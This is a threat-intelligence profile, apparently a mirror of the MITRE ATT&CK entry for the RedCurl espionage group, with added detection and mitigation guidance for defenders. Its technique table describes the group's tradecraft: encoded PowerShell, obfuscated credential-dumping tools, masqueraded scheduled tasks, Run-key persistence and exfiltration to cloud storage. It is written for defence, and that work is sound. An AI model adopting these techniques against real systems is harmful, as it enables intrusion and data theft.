G1039: RedCurl
RedCurl is a threat actor active since 2018 notable for corporate espionage targeting a variety of locations, including Ukraine, Canada and the United Kingdom, and a variety of industries, including but not limited to travel agencies, insurance companies, and banks.[1] RedCurl is allegedly a Russian-speaking threat actor.[1][2] The group’s operations typically start with spearphishing emails to gain initial access, then the group executes discovery and collection commands and scripts to find corporate data. The group concludes operations by exfiltrating files to the C2 servers.
Analyst context for executives and security teams
RedCurl matters because ATT&CK describes it as a corporate espionage group that starts with spearphishing, performs discovery and collection to locate business data, and exfiltrates files to command-and-control servers. For leaders, the practical issue is not just malware detection; it is whether the organization can prove it can detect data reconnaissance, credential access, shared-drive collection, email/local file harvesting, and outbound web-based exfiltration before sensitive corporate information leaves the environment.
Executive priority
Prioritize RedCurl as a test case for espionage-focused resilience: phishing-to-data-theft readiness, credential protection, shared-drive governance, email/data handling, and incident response evidence quality. Security leaders should ask whether SOC telemetry covers scripted discovery, LSASS access, scheduled task persistence, PowerShell/cmd/VB/Python execution, and abnormal outbound web traffic. Risk owners should also validate whether sensitive data on endpoints, network shares, and local email stores is classified, access-controlled, and monitored well enough to support audit and investigation decisions.
Technical view
ATT&CK provides no official detection text for RedCurl, so defenders should derive validation from the mapped techniques. Emphasis should be on Windows-heavy behaviors in the relationships, including LSASS memory access, scheduled tasks, PowerShell, Windows command shell, Visual Basic, local email collection, account discovery, file/directory discovery, and web-protocol C2. Also validate coverage for cross-platform or non-Windows relationship context where relevant, including Python execution, automated collection/exfiltration, network share access, web services for C2, obfuscated files, masqueraded resource names/locations, and file deletion. Build detections around behavior chains rather than single commands: phishing-led initial access followed by discovery, credential access, collection from local systems or shared drives, and outbound transfer to C2 infrastructure.
Likely telemetry
- Endpoint process creation and command-line logging for PowerShell, cmd, VB-related execution, Python, discovery commands, and file operations
- Windows security and EDR telemetry for LSASS access, suspicious credential material access, and privilege context
- Scheduled task creation, modification, and execution records
- File system telemetry for bulk discovery, staging, copying, deletion, obfuscated/archive-like files, and access to local email stores such as Outlook cache/storage files
- Network share access logs and file server audit logs for unusual enumeration or collection from shared drives
Detection direction
- Validate whether detections correlate multiple mapped behaviors: spearphishing entry, scripted execution, discovery, collection, credential access, persistence, and exfiltration.
- Tune PowerShell, cmd, VB, and Python detections to reduce noise from administration while highlighting unusual parent processes, rare users, unexpected hosts, encoded or obfuscated content, and activity outside normal maintenance windows.
- Monitor LSASS access carefully, separating legitimate security tooling from unusual process access or dump-like behavior.
- Baseline scheduled task activity and alert on new or modified tasks created by unexpected users, scripts, or locations.
- Look for abnormal enumeration of files, directories, local accounts, domain accounts, email accounts, services, and network shares, especially when followed by copying, archiving, deletion, or outbound web traffic.
Mitigation priorities
- Harden phishing resistance and user reporting processes, since the official description says operations typically begin with spearphishing emails.
- Reduce credential theft exposure by limiting administrative privileges, protecting LSASS, and monitoring privileged access paths.
- Apply least privilege and access review to network shares, local sensitive data stores, and email data; reduce broad access to corporate documents where possible.
- Constrain and monitor scripting interpreters and scheduled task creation according to business need.
- Improve data classification, retention, and logging for files likely to be valuable in corporate espionage scenarios.
Analyst notes and limits
The supplied ATT&CK description characterizes RedCurl as active since 2018, associated with corporate espionage against multiple locations and industries, and allegedly Russian-speaking. The relationship set is useful for building a defensive scenario: credential access, execution through scripting, discovery, collection from endpoints/shares/email, C2 over web protocols or web services, and automated exfiltration. Treat this as a behavior-driven coverage review rather than an attribution-driven hunting package.
Platforms and tactics are not specified on the group object itself, and ATT&CK provides no official detection text for this object. Platform references in this take come from related techniques, not from a group-level platform declaration. The supplied data does not support claims about current activity, confirmed attribution, customer exposure, specific infrastructure, malware, indicators, or guaranteed detection coverage. Local telemetry, asset scope, and business data locations are required to determine actual risk and control effectiveness.
RedCurl
RedCurl is a threat actor active since 2018 notable for corporate espionage targeting a variety of locations, including Ukraine, Canada and the United Kingdom, and a variety of industries, including but not limited to travel agencies, insurance companies, and banks.[1] RedCurl is allegedly a Russian-speaking threat actor.[1][2] The group’s operations typically start with spearphishing emails to gain initial access, then the group executes discovery and collection commands and scripts to find corporate data. The group concludes operations by exfiltrating files to the C2 servers.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1027 | Obfuscated Files or Information | RedCurl has used malware with string encryption.Citationtherecord_redcurl RedCurl has also encrypted data and has encoded PowerShell commands using Base64.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 RedCurl has used `PyArmor` to obfuscate code execution of LaZagne. Citationgroup-ib_redcurl1 Additionally, RedCurl has obfuscated downloaded files by renaming them as commonly used tools and has used `echo`, instead of file names themselves, to execute files.Citationtrendmicro_redcurl |
| Enterprise | T1564.001 | Hidden Files and Directories Sub-technique | RedCurl added the “hidden” file attribute to original files, manipulating victims to click on malicious LNK files.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1102 | Web Service | RedCurl has used web services to download malicious files.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1114.001 | Local Email Collection Sub-technique | RedCurl has collected emails to use in future phishing campaigns.Citationgroup-ib_redcurl1 |
| Enterprise | T1039 | Data from Network Shared Drive | RedCurl has collected data about network drives.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1080 | Taint Shared Content | RedCurl has placed modified LNK files on network drives for lateral movement.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1204.002 | Malicious File Sub-technique | RedCurl has used malicious files to infect the victim machines.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2Citationtrendmicro_redcurl |
| Enterprise | T1005 | Data from Local System | RedCurl has collected data from the local disk of compromised hosts.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1119 | Automated Collection | RedCurl has used batch scripts to collect data.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1083 | File and Directory Discovery | RedCurl has searched for and collected files on local and network drives.Citationtherecord_redcurlCitationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | RedCurl has used the Windows Command Prompt to execute commands.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2Citationtrendmicro_redcurl |
| Enterprise | T1059.001 | PowerShell Sub-technique | RedCurl has used PowerShell to execute commands and to download malware.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2Citationtrendmicro_redcurl |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | RedCurl mimicked legitimate file names and scheduled tasks, e.g. ` MicrosoftCurrentupdatesCheck` and `MdMMaintenenceTask` to mask malicious files and scheduled tasks.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | RedCurl has used phishing emails with malicious files to gain initial access.Citationgroup-ib_redcurl1Citationtrendmicro_redcurl |
| Enterprise | T1059.005 | Visual Basic Sub-technique | RedCurl has used VBScript to run malicious files.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1560.001 | Archive via Utility Sub-technique | RedCurl has downloaded 7-Zip to decompress password protected archives.Citationtrendmicro_redcurl |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | RedCurl has used AES-128 CBC to encrypt C2 communications.Citationgroup-ib_redcurl2 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | RedCurl has used HTTP, HTTPS and Webdav protocls for C2 communications.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1087.003 | Email Account Sub-technique | RedCurl has collected information about email accounts.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1587.001 | Malware Sub-technique | RedCurl has created its own tools to use during operations.Citationtherecord_redcurl |
| Enterprise | T1087.001 | Local Account Sub-technique | RedCurl has collected information about local accounts.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1056.002 | GUI Input Capture Sub-technique | RedCurl prompts the user for credentials through a Microsoft Outlook pop-up.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1082 | System Information Discovery | RedCurl has collected information about the target system, such as system information and list of network connections.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | RedCurl has used malicious links to infect the victim machines.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1573.002 | Asymmetric Cryptography Sub-technique | RedCurl has used HTTPS for C2 communication.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | RedCurl has created scheduled tasks for persistence.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2Citationtrendmicro_redcurl |
| Enterprise | T1020 | Automated Exfiltration | RedCurl has used batch scripts to exfiltrate data.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1199 | Trusted Relationship | RedCurl has gained access to a contractor to pivot to the victim’s infrastructure.Citationtherecord_redcurl |
| Enterprise | T1537 | Transfer Data to Cloud Account | RedCurl has used cloud storage to exfiltrate data, in particular the megatools utilities were used to exfiltrate data to Mega, a file storage service.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1202 | Indirect Command Execution | RedCurl has used pcalua.exe to obfuscate binary execution and remote connections.Citationtrendmicro_redcurl |
| Enterprise | T1552.001 | Credentials In Files Sub-technique | |
| Enterprise | T1218.011 | Rundll32 Sub-technique | RedCurl has used rundll32.exe to execute malicious files.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2Citationtrendmicro_redcurl |
| Enterprise | T1087.002 | Domain Account Sub-technique | RedCurl has collected information about domain accounts using SysInternal’s AdExplorer functionality .Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | RedCurl has used phishing emails with malicious links to gain initial access.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1552.002 | Credentials in Registry Sub-technique | |
| Enterprise | T1070.004 | File Deletion Sub-technique | RedCurl has deleted files after execution.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2Citationtrendmicro_redcurl |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | RedCurl has established persistence by creating entries in `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.Citationgroup-ib_redcurl1Citationgroup-ib_redcurl2 |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | |
| Enterprise | T1059.006 | Python Sub-technique | RedCurl has used a Python script to establish outbound communication and to execute commands using SMB port 445.Citationtrendmicro_redcurl |
| Enterprise | T1003.001 | LSASS Memory Sub-technique | |
| Enterprise | T1046 | Network Service Discovery | RedCurl has used netstat to check if port 4119 is open.Citationtrendmicro_redcurl |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 320d14f2b03d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
group-ib_redcurl1
Group-IB. (2020, August). RedCurl: The Pentest You Didn’t Know About. Retrieved August 9, 2024.
Open source URL -
[2]
group-ib_redcurl2
Group-IB. (2021, November). RedCurl: The Awakening. Retrieved August 14, 2024.
Open source URL -
[3]
mitre-attack G1039Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.